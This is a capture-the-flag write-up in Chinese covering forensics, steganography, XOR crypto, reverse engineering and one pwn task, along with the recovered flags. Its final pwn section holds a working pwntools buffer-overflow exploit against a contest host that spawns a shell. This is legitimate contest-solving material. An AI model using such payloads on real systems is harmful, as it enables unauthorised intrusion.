长安战疫Wp
长安战疫wp
misc
八卦迷宫
直接走迷宫
cazy{zhanchangyangchangzhanyanghechangshanshananzhanyiyizhanyianyichanganyang}
朴实无华的取证
先python2 vol.py -f /home/ltlly/桌面/xp_sp3.raw imageinfo
--profile=WinXPSP3x86
python2 vol.py -f /home/ltlly/桌面/xp_sp3.raw pslist>1.txt
看一眼进程 试探之后发现notepad内容是?
*** Failed to import volatility.plugins.malware.threads (NameError: name 'distorm3' is not defined)
*** Failed to import volatility.plugins.mac.apihooks_kernel (ImportError: No module named distorm3)
*** Failed to import volatility.plugins.mac.check_syscall_shadow (ImportError: No module named distorm3)
*** Failed to import volatility.plugins.ssdt (NameError: name 'distorm3' is not defined)
*** Failed to import volatility.plugins.mac.apihooks (ImportError: No module named distorm3)
Offset(V) Name PID PPID Thds Hnds Sess Wow64 Start Exit
---------- -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0x8214fa00 System 4 0 56 364 ------ 0
0x81cfe778 smss.exe 588 4 3 19 ------ 0 2021-12-27 00:51:12 UTC+0000
0x81b39da0 csrss.exe 636 588 12 841 0 0 2021-12-27 00:51:13 UTC+0000
0x81ffb020 winlogon.exe 668 588 23 526 0 0 2021-12-27 00:51:13 UTC+0000
0x81b3bbf0 services.exe 712 668 15 308 0 0 2021-12-27 00:51:13 UTC+0000
0x81c80478 lsass.exe 724 668 21 360 0 0 2021-12-27 00:51:13 UTC+0000
0x81b27370 vmacthlp.exe 908 712 1 25 0 0 2021-12-27 00:51:13 UTC+0000
0x81b3da70 svchost.exe 924 712 17 205 0 0 2021-12-27 00:51:13 UTC+0000
0x82076b18 svchost.exe 988 712 10 296 0 0 2021-12-27 00:51:13 UTC+0000
0x81f228b8 svchost.exe 1084 712 72 1491 0 0 2021-12-27 00:51:13 UTC+0000
0x81b11450 svchost.exe 1176 712 6 93 0 0 2021-12-27 00:51:13 UTC+0000
0x81b4eda0 Pinyin_2345Svc. 1196 712 17 367 0 0 2021-12-27 00:51:13 UTC+0000
0x81b70be8 svchost.exe 1312 712 3 103 0 0 2021-12-27 00:51:14 UTC+0000
0x81f5b440 Protect_2345Exp 1324 712 11 335 0 0 2021-12-27 00:51:14 UTC+0000
0x81f06da0 Pic_2345Svc.exe 1368 712 26 432 0 0 2021-12-27 00:51:14 UTC+0000
0x81b1c620 ZhuDongFangYu.e 1508 712 19 235 0 0 2021-12-27 00:51:14 UTC+0000
0x81bae4b0 spoolsv.exe 1764 712 10 136 0 0 2021-12-27 00:51:14 UTC+0000
0x81b1eda0 explorer.exe 1904 1820 33 980 0 0 2021-12-27 00:51:14 UTC+0000
0x81bf7748 2345PinyinCloud 2016 1904 21 390 0 0 2021-12-27 00:51:15 UTC+0000
0x81b62c20 FaceTool_2345Pi 304 2016 12 230 0 0 2021-12-27 00:51:16 UTC+0000
0x81c1a020 360tray.exe 916 1904 158 1704 0 0 2021-12-27 00:51:18 UTC+0000
0x81bdd9b8 vmtoolsd.exe 944 1904 10 345 0 0 2021-12-27 00:51:18 UTC+0000
0x81c7cc80 ctfmon.exe 932 1904 6 180 0 0 2021-12-27 00:51:18 UTC+0000
0x81b5ada0 2345PinyinUpdat 1052 1196 0 -------- 0 0 2021-12-27 00:51:18 UTC+0000 2021-12-27 00:58:08 UTC+0000
0x81d78770 TsBrowserSvr.ex 2856 712 12 217 0 0 2021-12-27 00:51:40 UTC+0000
0x81d29670 VGAuthService.e 2916 712 2 60 0 0 2021-12-27 00:51:40 UTC+0000
0x81c215c8 vmtoolsd.exe 3420 712 7 273 0 0 2021-12-27 00:51:52 UTC+0000
0x81f09750 alg.exe 3820 712 5 104 0 0 2021-12-27 00:51:53 UTC+0000
0x81a18768 wmiprvse.exe 3844 924 13 302 0 0 2021-12-27 00:51:53 UTC+0000
0x819ad580 360bdoctor.exe 2832 916 9 262 0 0 2021-12-27 01:02:55 UTC+0000
0x819a78f8 360seupdate.exe 440 2832 0 -------- 0 0 2021-12-27 01:02:55 UTC+0000 2021-12-27 01:02:56 UTC+0000
0x819b45f8 sesvc.exe 3920 2832 0 -------- 0 0 2021-12-27 01:02:56 UTC+0000 2021-12-27 01:02:56 UTC+0000
0x81c47308 svchost.exe 3488 712 5 128 0 0 2021-12-27 01:40:27 UTC+0000
0x81fd27e8 softupnotify.ex 2936 916 0 -------- 0 0 2021-12-27 01:40:40 UTC+0000 2021-12-27 01:40:40 UTC+0000
0x819b0970 mspaint.exe 3888 1904 9 258 0 0 2021-12-27 01:44:37 UTC+0000
0x81a08da0 conime.exe 3260 2124 9 183 0 0 2021-12-27 01:44:47 UTC+0000
0x81d68a50 IEXPLORE.EXE 3748 1904 21 578 0 0 2021-12-27 01:44:52 UTC+0000
0x819d6a18 wdswfsafe.exe 2136 916 4 70 0 0 2021-12-27 01:44:52 UTC+0000
0x819c98a0 softupnotify.ex 884 916 0 -------- 0 0 2021-12-27 01:44:52 UTC+0000 2021-12-27 01:44:52 UTC+0000
0x81c2b2f0 IEXPLORE.EXE 3976 3748 37 1374 0 0 2021-12-27 01:44:52 UTC+0000
0x819b23b0 softupnotify.ex 1916 916 0 -------- 0 0 2021-12-27 02:00:18 UTC+0000 2021-12-27 02:00:18 UTC+0000
0x81c33630 softupnotify.ex 972 916 0 -------- 0 0 2021-12-27 02:03:28 UTC+0000 2021-12-27 02:03:28 UTC+0000
0x81f2c7e0 notepad.exe 2976 1904 6 180 0 0 2021-12-27 02:27:06 UTC+0000
0x81c7f630 360zip.exe 3388 1904 10 366 0 0 2021-12-27 02:28:39 UTC+0000
0x81d4d020 2345PicViewer.e 3812 1904 23 378 0 0 2021-12-27 02:36:41 UTC+0000
0x81923020 taskmgr.exe 3628 668 9 188 0 0 2021-12-27 02:37:11 UTC+0000
0x81c30da0 DumpIt.exe 3300 1904 1 16 0 0 2021-12-27 02:37:38 UTC+0000 ```
python2 vol.py -f /home/ltlly/桌面/xp_sp3.raw filescan >file.txt
看看文件 搜flag
0x0000000001b34f90 1 1 R--r-- \Device\HarddiskVolume1\Documents and Settings\Administrator\桌面\flag.zip
0x0000000001e65028 1 0 R--rw- \Device\HarddiskVolume1\Documents and Settings\Administrator\桌面\flag.png
0x00000000017ad6a8 2 0 R--rw- \Device\HarddiskVolume1\Documents and Settings\Administrator\桌面\flag.zip
0x00000000018efcb8 1 0 RW-rw- \Device\HarddiskVolume1\Documents and Settings\Administrator\Recent\flag.lnk
直接都导出来
一个压缩包损坏 先不修
另一个压缩包直接跑 密码20211209
拿到一个加密脚本
void Encrypt(string& str)
{
for(int i = 0; i < str.length(); i++)
{
if(str[i] >='a'&& str[i]<='w')
str[i]+=3;
else if(str[i]=='x')
str[i]='a';
else if(str[i]=='y')
str[i]='b';
else if(str[i]=='z')
str[i]='c';
else if(str[i]=='_')
str[i]='|';
str[i] -= 32;
}
}
a = "FDCB[8LDQ?ZL00?FHUWDLQ0B?VXFFHHG?LQ?ILJKWLQJ?WKH?HSLGHPLF]"
# for x in a:
# print(chr(ord(x) + 32), end="")
a = "fdcb{Xldq_zlPP_fhuwdlqPb_vxffhhg_lq_iljkwlqj_wkh_hslghplf}"
for x in a:
if x == 'a':
print("x", end="")
elif x == 'b':
print("y", end="")
elif x == 'c':
print("z", end="")
elif x == "|":
print("_", end="")
elif x.islower():
print(chr(ord(x) - 3), end="")
else:
print(chr(ord(x)), end="")
cazy{Xian_wiPP_certainPy_succeed_in_fighting_the_epidemic}
不太对 小改一下
cazy{Xian_will_certainly_succeed_in_fighting_the_epidemic}
无字天书
别找流量啦 开导!
binwalk-e 拿
hex转字符 是个压缩包
解压
key.ws是whitespace https://vii5ard.github.io/whitespace/
flag.txt是snow
西安加油
导出所有!
hint.txt base32解密
9403.png is 0
8086.png is 1
7301.png is 2
7422.png is 3
3978.png is 4
8266.png is 5
7683.png is 6
5410.png is 7
4365.png is 8
2426.png is 9
9056.png is 10
3205.png is 11
6361.png is 12
9167.png is 13
3195.png is 14
5852.png is 15
9280.png is 16
9702.png is 17
8424.png is 18
1675.png is 19
3014.png is 20
7986.png is 21
8432.png is 22
7139.png is 23
4655.png is 24
7258.png is 25
3565.png is 26
5444.png is 27
7384.png is 28
2003.png is 29
8688.png is 30
5956.png is 31
3509.png is 32
9027.png is 33
1905.png is 34
6085.png is 35
7406.png is 36
1650.png is 37
8602.png is 38
9377.png is 39
1323.png is 40
7321.png is 41
2747.png is 42
7125.png is 43
1220.png is 44
7079.png is 45
5172.png is 46
5070.png is 47
secret.txt是base64 解出来压缩包解压
然后 拼
binary
改后缀class ij打开
数组拿走
a=[77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 69, 119, 77, 84, 69, 120, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 65, 120, 77, 84, 69, 120, 77, 84, 69, 119, 77, 84, 69, 120, 77, 68, 65, 119, 77, 68, 65, 119, 77, 70, 120, 117, 77, 68, 69, 120, 77, 84, 69, 120, 77, 68, 69, 119, 77, 84, 69, 119, 77, 84, 65, 120, 77, 68, 69, 120, 77, 84, 69, 120, 77, 68, 65, 119, 77, 84, 69, 120, 77, 68, 69, 120, 77, 68, 69, 120, 77, 84, 69, 120, 77, 70, 120, 117, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 69, 119, 77, 68, 65, 119, 77, 84, 69, 120, 77, 84, 65, 119, 77, 68, 69, 120, 77, 84, 65, 120, 77, 68, 69, 120, 77, 68, 69, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 70, 120, 117, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 69, 120, 77, 68, 65, 119, 77, 68, 65, 120, 77, 84, 65, 119, 77, 68, 69, 120, 77, 84, 65, 119, 77, 68, 65, 119, 77, 84, 65, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 70, 120, 117, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 69, 120, 77, 84, 65, 120, 77, 84, 65, 120, 77, 84, 65, 119, 77, 84, 69, 119, 77, 84, 69, 119, 77, 84, 65, 120, 77, 84, 69, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 70, 120, 117, 77, 68, 69, 120, 77, 84, 69, 120, 77, 68, 69, 119, 77, 84, 69, 120, 77, 68, 69, 119, 77, 68, 65, 119, 77, 68, 65, 119, 77, 84, 65, 119, 77, 84, 65, 119, 77, 68, 65, 120, 77, 68, 69, 120, 77, 84, 69, 120, 77, 70, 120, 117, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 69, 119, 77, 84, 65, 120, 77, 68, 69, 119, 77, 84, 65, 120, 77, 68, 69, 119, 77, 84, 65, 120, 77, 68, 69, 119, 77, 84, 65, 120, 77, 68, 65, 119, 77, 68, 65, 119, 77, 70, 120, 117, 77, 84, 69, 120, 77, 84, 69, 120, 77, 84, 69, 119, 77, 68, 69, 119, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 69, 119, 77, 68, 69, 120, 77, 68, 65, 120, 77, 84, 69, 120, 77, 84, 69, 120, 77, 84, 69, 120, 77, 86, 120, 117, 77, 84, 69, 119, 77, 68, 65, 120, 77, 68, 69, 119, 77, 84, 65, 120, 77, 68, 65, 119, 77, 68, 69, 119, 77, 84, 69, 120, 77, 84, 69, 120, 77, 68, 69, 119, 77, 68, 65, 119, 77, 68, 65, 120, 77, 84, 65, 119, 77, 70, 120, 117, 77, 68, 69, 119, 77, 84, 69, 119, 77, 84, 65, 119, 77, 68, 69, 120, 77, 68, 65, 120, 77, 68, 65, 120, 77, 68, 65, 119, 77, 68, 69, 119, 77, 68, 69, 120, 77, 68, 69, 119, 77, 84, 65, 120, 77, 84, 69, 119, 77, 86, 120, 117, 77, 84, 65, 120, 77, 84, 65, 119, 77, 68, 65, 119, 77, 84, 65, 119, 77, 84, 69, 120, 77, 84, 65, 119, 77, 84, 69, 119, 77, 68, 65, 120, 77, 84, 65, 120, 77, 68, 65, 119, 77, 68, 65, 120, 77, 68, 65, 120, 77, 70, 120, 117, 77, 84, 69, 120, 77, 68, 69, 120, 77, 84, 69, 120, 77, 84, 69, 120, 77, 68, 65, 120, 77, 68, 69, 119, 77, 84, 69, 119, 77, 84, 65, 119, 77, 68, 69, 120, 77, 68, 69, 119, 77, 84, 65, 120, 77, 84, 69, 119, 77, 70, 120, 117, 77, 84, 65, 120, 77, 68, 69, 120, 77, 68, 65, 119, 77, 84, 69, 120, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 69, 120, 77, 68, 69, 119, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 65, 120, 77, 70, 120, 117, 77, 68, 69, 120, 77, 68, 69, 119, 77, 84, 65, 119, 77, 84, 65, 119, 77, 68, 69, 119, 77, 68, 65, 120, 77, 84, 65, 120, 77, 84, 69, 119, 77, 84, 65, 120, 77, 84, 69, 119, 77, 84, 69, 120, 77, 84, 69, 119, 77, 86, 120, 117, 77, 68, 65, 120, 77, 68, 69, 119, 77, 68, 69, 119, 77, 68, 69, 120, 77, 84, 69, 120, 77, 84, 69, 119, 77, 84, 69, 120, 77, 68, 65, 119, 77, 68, 69, 120, 77, 68, 65, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 70, 120, 117, 77, 68, 65, 120, 77, 68, 65, 119, 77, 84, 69, 119, 77, 84, 69, 120, 77, 68, 69, 120, 77, 68, 69, 120, 77, 68, 65, 120, 77, 84, 65, 119, 77, 84, 69, 119, 77, 68, 69, 120, 77, 68, 65, 120, 77, 84, 69, 119, 77, 86, 120, 117, 77, 84, 69, 120, 77, 68, 69, 119, 77, 68, 69, 120, 77, 68, 65, 119, 77, 84, 69, 120, 77, 84, 69, 120, 77, 84, 65, 120, 77, 84, 65, 120, 77, 68, 65, 120, 77, 84, 65, 119, 77, 68, 65, 119, 77, 68, 65, 120, 77, 70, 120, 117, 77, 68, 65, 119, 77, 68, 69, 120, 77, 84, 65, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 84, 69, 119, 77, 68, 65, 119, 77, 68, 69, 119, 77, 84, 69, 119, 77, 84, 69, 120, 77, 84, 69, 120, 77, 68, 69, 120, 77, 86, 120, 117, 77, 84, 69, 119, 77, 84, 69, 119, 77, 68, 69, 120, 77, 68, 69, 119, 77, 84, 69, 119, 77, 84, 65, 119, 77, 84, 69, 119, 77, 68, 65, 120, 77, 68, 69, 119, 77, 68, 69, 120, 77, 68, 65, 119, 77, 68, 69, 119, 77, 70, 120, 117, 77, 68, 69, 119, 77, 84, 65, 119, 77, 84, 65, 119, 77, 84, 69, 120, 77, 84, 65, 119, 77, 84, 65, 119, 77, 68, 65, 119, 77, 84, 65, 119, 77, 84, 69, 120, 77, 68, 65, 120, 77, 68, 65, 120, 77, 68, 69, 120, 77, 86, 120, 117, 77, 68, 69, 119, 77, 84, 65, 120, 77, 68, 65, 120, 77, 84, 65, 119, 77, 68, 69, 120, 77, 84, 65, 119, 77, 68, 69, 120, 77, 68, 65, 120, 77, 68, 65, 119, 77, 68, 65, 120, 77, 68, 69, 119, 77, 84, 65, 119, 77, 70, 120, 117, 77, 84, 65, 119, 77, 84, 69, 119, 77, 84, 69, 120, 77, 84, 69, 119, 77, 84, 69, 120, 77, 68, 69, 120, 77, 68, 65, 120, 77, 68, 65, 120, 77, 84, 69, 120, 77, 84, 69, 119, 77, 84, 65, 120, 77, 84, 69, 119, 77, 86, 120, 117, 77, 84, 69, 119, 77, 84, 69, 119, 77, 68, 65, 120, 77, 68, 69, 120, 77, 84, 65, 119, 77, 68, 65, 119, 77, 68, 69, 119, 77, 84, 69, 120, 77, 68, 69, 120, 77, 68, 65, 119, 77, 84, 65, 120, 77, 84, 65, 120, 77, 70, 120, 117, 77, 68, 65, 120, 77, 84, 65, 119, 77, 84, 65, 119, 77, 68, 69, 120, 77, 84, 69, 119, 77, 84, 69, 119, 77, 68, 65, 120, 77, 84, 69, 120, 77, 68, 69, 119, 77, 68, 69, 119, 77, 68, 69, 120, 77, 84, 69, 119, 77, 86, 120, 117, 77, 68, 69, 119, 77, 84, 65, 119, 77, 68, 65, 119, 77, 84, 69, 120, 77, 68, 69, 119, 77, 84, 69, 120, 77, 68, 69, 120, 77, 68, 69, 119, 77, 84, 69, 120, 77, 84, 69, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 70, 120, 117, 77, 68, 69, 119, 77, 84, 65, 120, 77, 84, 65, 120, 77, 84, 65, 119, 77, 84, 65, 119, 77, 84, 65, 119, 77, 68, 65, 119, 77, 68, 69, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 65, 120, 77, 84, 69, 120, 77, 86, 120, 117, 77, 68, 69, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 65, 119, 77, 84, 69, 120, 77, 68, 65, 120, 77, 68, 69, 120, 77, 68, 65, 120, 77, 84, 65, 120, 77, 84, 69, 120, 77, 84, 65, 119, 77, 84, 69, 119, 77, 70, 120, 117, 77, 68, 69, 120, 77, 84, 65, 119, 77, 84, 69, 120, 77, 84, 69, 119, 77, 68, 65, 119, 77, 68, 65, 120, 77, 68, 69, 120, 77, 68, 69, 120, 77, 68, 69, 120, 77, 84, 65, 119, 77, 84, 69, 120, 77, 84, 69, 119, 77, 70, 120, 117, 77, 68, 69, 119, 77, 68, 69, 120, 77, 68, 65, 120, 77, 68, 69, 120, 77, 68, 65, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 69, 120, 77, 84, 65, 120, 77, 84, 65, 119, 77, 68, 65, 119, 77, 68, 65, 119, 77, 70, 120, 117, 77, 84, 69, 120, 77, 84, 69, 120, 77, 84, 69, 119, 77, 84, 65, 120, 77, 84, 65, 119, 77, 84, 69, 120, 77, 68, 65, 120, 77, 84, 69, 119, 77, 68, 69, 119, 77, 84, 65, 120, 77, 84, 69, 119, 77, 84, 65, 120, 77, 86, 120, 117, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 69, 120, 77, 84, 65, 119, 77, 68, 69, 120, 77, 84, 65, 120, 77, 84, 65, 120, 77, 68, 69, 120, 77, 68, 65, 119, 77, 84, 65, 120, 77, 68, 69, 119, 77, 68, 69, 119, 77, 70, 120, 117, 77, 68, 69, 120, 77, 84, 69, 120, 77, 68, 69, 120, 77, 84, 65, 119, 77, 84, 69, 119, 77, 84, 65, 120, 77, 68, 69, 120, 77, 68, 69, 119, 77, 84, 69, 119, 77, 68, 65, 120, 77, 84, 69, 119, 77, 84, 69, 120, 77, 86, 120, 117, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 69, 119, 77, 68, 69, 120, 77, 68, 65, 119, 77, 68, 69, 120, 77, 68, 65, 120, 77, 84, 65, 120, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 65, 120, 77, 70, 120, 117, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 69, 119, 77, 84, 69, 120, 77, 84, 69, 119, 77, 84, 69, 119, 77, 68, 65, 120, 77, 84, 69, 120, 77, 84, 69, 120, 77, 84, 69, 120, 77, 68, 69, 119, 77, 68, 69, 120, 77, 86, 120, 117, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 69, 119, 77, 84, 69, 119, 77, 84, 69, 120, 77, 84, 69, 120, 77, 84, 69, 119, 77, 68, 65, 119, 77, 68, 65, 120, 77, 68, 69, 119, 77, 84, 65, 120, 77, 68, 69, 120, 77, 70, 120, 117, 77, 68, 69, 120, 77, 84, 69, 120, 77, 68, 69, 120, 77, 84, 69, 120, 77, 84, 65, 119, 77, 68, 69, 119, 77, 84, 69, 119, 77, 84, 65, 119, 77, 84, 69, 120, 77, 84, 65, 119, 77, 68, 69, 120, 77, 68, 69, 120, 77, 70, 120, 117, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 69, 120, 77, 84, 69, 120, 77, 84, 65, 120, 77, 84, 69, 120, 77, 68, 69, 120, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 69, 119, 77, 68, 65, 120, 77, 84, 65, 119, 77, 65, 61, 61]
for x in a:
print(chr(x),end="")
出base64 解密拿到一堆01 还带换行符真贴心
from PIL import Image
x = 37
y = 37
im = Image.new('RGB', (x, y))
white = (255, 255, 255)
black = (0, 0, 0)
with open('新建文本文档 (2).txt') as f:
for i in range(x):
ff = f.readline()
for j in range(y):
if ff[j] == '1':
im.putpixel((i, j), black)
else:
im.putpixel((i, j), white)
im.save("1.jpg")
画二维码扫描
flag{932b2c0070e4897ea7df0190dbf36ece}
crypto
只会一道怎么说
no_cry_no_can
from Cryptodome.Util.number import *
# from secret import flag, key
flag="cazy{aaaaaa}".encode()
key="bbbbb".encode()
assert len(key) <= 5
assert flag[:5] == b'cazy{'
def can_encrypt(flag, key):
block_len = len(flag) // len(key) + 1
new_key = key * block_len
return bytes([i ^ j for i, j in zip(flag, new_key)])
c = can_encrypt(flag, key)
print(c)
# b'<pH\x86\x1a&"m\xce\x12\x00pm\x97U1uA\xcf\x0c:NP\xcf\x18~l'
很简单的加密
flag前面五位固定cazy{
key最多五位 flag和key逐位异或
所以先拿cazy{异或拿key
再返回来异或拿flag
from Cryptodome.Util.number import *
d = b'<pH\x86\x1a&"m\xce\x12\x00pm\x97U1uA\xcf\x0c:NP\xcf\x18~l'
for index in range(len(d)):
print(hex((d[index] ^ b"cazy{"[index % 5])),end=",")
#拿走前五位
for index in range(len(d)):
print(chr(d[index] ^ b"\x5f\x11\x32\xff\x61"[index % 5]), end="")
cazy{y3_1s_a_h4nds0me_b0y!}
RE!
combat_slogan
解压 拿走main.class ij打开
d="Jr_j11y_s1tug_g0_raq_g0_raq_pnml"
for x in d:
if ord(x)>=ord('a') and ord(x)<=ord('m'):
print(chr(ord(x)+13),end="")
elif ord(x)>=ord('A') and ord(x)<=ord('M'):
print(chr(ord(x)+13),end="")
elif ord(x)>=ord('n') and ord(x)<=ord('z'):
print(chr(ord(x)-13),end="")
elif ord(x)>=ord('N') and ord(x)<=ord('Z'):
print(chr(ord(x)-13),end="")
else:
print(x,end="")
We_w11l_f1ght_t0_end_t0_end_cazy
cute_dog
ida
一眼base64 Zmxh是fla
flag{Ch1na_yyds_cazy}
hellopy
pyc在线反编译'
反编译出来跑不了 手动看得了 交替运行的两个函数 一个^index 一个^后一位
从后往前加密 所以从前往后解密
a = [44, 100, 3, 50, 106, 90, 5, 102, 10, 112]
for index in range(len(a) - 1):
if index % 2:
a[index] = a[index] ^ index
else:
a[index] = a[index] ^ a[index + 1]
print(a)
for x in a:
print(chr(x), end="")
He110_cazp
多异或最后一个 不想改脚本
所以是
He110_cazy
pwn
pwn1
from pwn import *
r = remote('113.201.14.253', 16088)
shell_addr = 0x8048540
buf_addr = int(r.recvuntil(b'\n', drop=True)[2:], 16)
payload = b'a' * (0x38 - 0x4)+ p32(buf_addr + 0x38+4)+ p32(shell_addr)
r.sendline(payload)
r.interactive()
